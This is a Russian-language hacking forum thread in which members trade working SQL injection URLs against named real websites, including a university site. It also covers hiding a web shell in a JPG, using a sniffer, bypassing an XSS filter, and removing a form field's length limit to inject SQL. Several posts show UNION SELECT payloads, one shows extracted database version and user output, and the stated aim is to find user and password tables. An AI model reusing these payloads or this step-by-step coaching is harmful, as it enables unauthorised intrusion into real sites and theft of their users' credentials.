Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    192
    Likes Received:
    675
    Reputations:
    333
    судя по from user, from password хорошие данные с хорошим префиксом) или в другой дб
    rofl продвинутый способ локального инклуда (в серьёз не воспринимать) :) _eurashe.eu/RunScript.asp?page=&Article_ID=97+union+select+*+from+\boot.ini.lalala&ap=NewsDetail.asp&p=ASP%5C~Pg0.asp
     
    1 person likes this.
  2. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Не понял, что там про from user, from password?
    Насколько мне известно, таких таблиц в Microsoft access не может быть. Или я что-то путаю?
     
    1 person likes this.
  3. vakula

    vakula New Member

    Joined:
    20 Jan 2008
    Messages:
    41
    Likes Received:
    4
    Reputations:
    0
    Официальный сайт Евгении Власовой.
    Народ, я так понимаю это скуля?
    http://www.vlasova.com.ua/news.php?item=70'
    но роскрутить её дальше не могу...попробуйте
     
  4. big_BRAT

    big_BRAT Elder - Старейшина

    Joined:
    23 Dec 2006
    Messages:
    78
    Likes Received:
    64
    Reputations:
    7
    http://www.vlasova.com.ua/news.php?item=-70'+UniOn+SelecT+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7/*

    4.1.22:vlasova:u_vlasova@localhost
     
  5. vakula

    vakula New Member

    Joined:
    20 Jan 2008
    Messages:
    41
    Likes Received:
    4
    Reputations:
    0
    кто найдёт таблу, отпишитесь
     
  6. Screw

    Screw New Member

    Joined:
    11 Dec 2007
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Нашел вот скулю: http://students.msm.ru/sc/?act=view&op=anketa&uid=-1000'+union+select+1,version(),3,4,5,6,7,user(),database(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50+/*
    Но никак не получается подобрать таблицы и столбцы((( Кому не влом, плиз, помогите...
     
  7. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    438
    Likes Received:
    164
    Reputations:
    -19
    народ как засунуть шелл в формат .jpg
    ну как на видео делают, там они заливают картинку а там шелл что то типа такого
     
  8. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    ACD или FastStone редактировать EXIF в Image Properties
     
    #4628 Pashkela, 14 Jan 2009
    Last edited: 14 Jan 2009
  9. ZEXEL

    ZEXEL Elder - Старейшина

    Joined:
    7 Jan 2008
    Messages:
    366
    Likes Received:
    201
    Reputations:
    4
    Кто подскажет щас нормально работает сервис по сниферам http://na-s.ru/ ?
    А то почему то мне логи не проходят
     
  10. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Свой снифак давно надо юзать, вот, от каника:

    http://pashkela.narod.ru/sniffer.rar
     
  11. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    XSS
    Что можно попробовать если фильтр сжирает </script>
     
  12. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    http://www.inattack.ru/article/519.html
     
    1 person likes this.
  13. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    438
    Likes Received:
    164
    Reputations:
    -19
    Все еще интересует!

    Pashkela ACD несколько версий и я не знаю какую качать а вторая не хочет устанавливаться
     
  14. aka PSIH

    aka PSIH Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    584
    Likes Received:
    284
    Reputations:
    51
  15. pinky07

    pinky07 Member

    Joined:
    2 Jan 2009
    Messages:
    55
    Likes Received:
    34
    Reputations:
    6
    помогите плиз найти таблицу с юзерами и пассами все облазил нигде не нашел((

    http://www.ksu.ru/vybor.php?newstype_id=-6+union+select+1,2,table_name,4,5,6,7,8,9,10,11+from+information_schema.tables--

    вывод всех таблиц

    p.s. Сайт казанского государственного университета
     
  16. oRb

    oRb Elder - Старейшина

    Joined:
    9 May 2008
    Messages:
    294
    Likes Received:
    581
    Reputations:
    256
    pinky07, используй limit в запросах:
    http://www.ksu.ru/vybor.php?newstype_id=-6+union+select+1,2,table_name,4,5,6,7,8,9,10,11+from+information_schema.tables+limit+30,20--

    а то там скрипт только 20 таблиц выдает.
     
    1 person likes this.
  17. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    438
    Likes Received:
    164
    Reputations:
    -19
    здрасти, собрался ставить булку так вот интересует вопрос как поставить фиксы на хаки(эксплоиты) или же надо самим в ручную капаца в php коде и вправлять?
     
  18. .zGA

    .zGA Banned

    Joined:
    11 Jan 2009
    Messages:
    3
    Likes Received:
    2
    Reputations:
    -5
    самому менять или ставить зафиксеные хаки
     
  19. Qam

    Qam New Member

    Joined:
    16 Jan 2009
    Messages:
    30
    Likes Received:
    3
    Reputations:
    0
    Вобщем помогите мне в таком вопрсе,есть поле для ввода в форуме при вводе числа в которое ты переходишь на страницу число которой ты написал в этом поле,но если в это поле вписать капострофу,тоесть одиночную кавычку то MySQL выдаёт синтаксическую ошибку вообщем вот "Общая ошибка

    Could not obtain post/user information.

    DEBUG MODE

    SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-3, 3' at line 8

    SELECT u.username, u.user_id, u.user_level, u.user_posts, u.user_nic_color, u.user_allowsmile, u.user_allow_viewonline, u.user_session_time, p.*, pt.post_text, pt.post_subject, pt.bbcode_uid, u.user_reputation, u.user_reputation_plus, u.user_warnings, u.user_level FROM phpbb_posts p, phpbb_users u, phpbb_posts_text pt WHERE p.topic_id = 1 AND pt.post_id = p.post_id AND u.user_id = p.poster_id ORDER BY p.post_time DESC LIMIT -3, 3

    Line : 449
    File : viewtopic.php"
    Возможно ли здесь провисти скуль инъекцию!?Вызывает сомнение то что отрываю исходный тест то вижу это <br/>Стр.<input type="text" name="start1" size="3" value="3"><input type="submit" value="&gt;&gt;"/></form></p> тоесть в это поле можно вести только 3 символа!!Стоит ли пробывать провести скуль инъекцию или нет??
     
  20. big_BRAT

    big_BRAT Elder - Старейшина

    Joined:
    23 Dec 2006
    Messages:
    78
    Likes Received:
    64
    Reputations:
    7
    1. "....тоесть в это поле можно вести только 3 символа!!" сохраняешь исходник страницы, правишь полный путь в форме к скрипту, и удаляешь параметр size="3". Как вариант отлавливаешь запрос naviscope+inetcrack правишь и отправляешь.

    2. по иньекции не думаю что то то выйдет, как я понял иньекция в поле limit
     
Loading...
Thread Status:
Not open for further replies.